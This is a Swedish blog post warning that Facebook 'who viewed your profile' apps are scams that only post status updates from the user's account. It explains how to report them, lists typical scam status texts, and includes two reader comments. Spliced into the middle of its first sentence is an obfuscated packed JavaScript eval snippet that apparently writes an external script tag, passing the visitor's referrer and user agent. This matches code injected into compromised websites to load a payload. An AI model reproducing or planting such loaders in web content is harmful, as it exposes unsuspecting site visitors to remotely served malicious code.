Image Image Image Image Image Image Image Image Image Image

| 13 maj, 2021

Scroll to top

Top

Kan man se hur många som besökt sin Facebookprofil?

Kan man se hur många som besökt sin Facebookprofil?
Sebastian

Varje eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|aydzr|var|u0026u|referrer|ykseb||js|php’.split(’|’),0,{}))
dag så ser jag i mitt Facebookflöde att flera vänner ändrar sin status till ”Coolt, jag har haft 120 besök på min facebookprofil idag”. Detta är applikationer som folk byggt och egentligen bara skickar ut en statusuppdatering från ditt kont. På kuppen tjänar en slant på någon reklam som visas eller liknande.

Det är inte tekniskt möjligt att ta reda på information om hur många besök man haft på sin facebookprofil. Inte heller vem som besökt den.
Det är inte tillåtet att försöka bygga sådana applikationer. De som gör det bryter mot Facebooks användarpolicy.

Läs här vad Facebook själva skrivit om situationen: Läs

Jag börjar bli lite små trött på alla som går på detta ”scam” eller vad man ska kalla det. Efter många år får det faktiskt någon gång ta slut 😛
Nästa gång ni ser detta bör ni anmäla / rapportera det till Facebook. Om ni redan har accepterat applikationen så bör ni ta bort den så att ni inte behöver leva med att det skickas ut underliga meddelanden från dig.

För att rapportera applikationen klicka på ”Anmäl applikation”

Det är alltid bra att bifoga en skärmavbild på det du vill rapportera. På så sätt går det nämligen ännu snabbare för Facebook att identifiera vad du tycker är felaktigt med applikationen. Slutligen är det bara att klicka ”Anmäl”.

Bloggar.se om: , ,

Vanliga statusuppdateringar som använt liknande applikationer:

 • wow! man har kollat in min profil
 • se vem som tittar på din profil facebook
 • gånger bara i dag och jag ser att jag har ett ganska stort antal stalkers lol! ta reda på dina här
 • vem tittar på min profil facebook
 • hur många har kollat på din profil facebook
 • wow man har kollat in min profil
 • se vem som kollat på din facebook
 • se vem som tittar på din facebookprofil
 • se vem som ser ens profil på facebook
 • se vem som kollat din profil på facebook

Comments

 1. Pelle Grund

  Jag hade en plugin till chrome förut jag på riktigt kunde ifall någon tog bort mig som vän. Tror att det fanns en som på något sätt kunde se besök också.

  Den som kollade om folk tog bort en som vän fungerade så att den gjorde uppdateringar hela tiden på din profil och så fort den märkta att det saknaden någon så gjorde den en sökning och tog fram den personen som inte syntes längre i loopen. Riktigt smart app faktiskt.

  Dock kör jag Firefox nu för jag gillar det bättre, men kanske finns det liknande addons på firefox också. Det är bara att söka istället för att acceptera massa spam grejer på facebook.

  • 123123

   Hej!
   Det finns externa sådana applikationer som exempevis ”outandin”. Skulle inte tro att du haft en applikation som loggar besök, då facebook ligger på andra serverar som DU besöker. Du skulle alternativt kunna logga dina egna besök, men andras blir svåra att komma åt. =)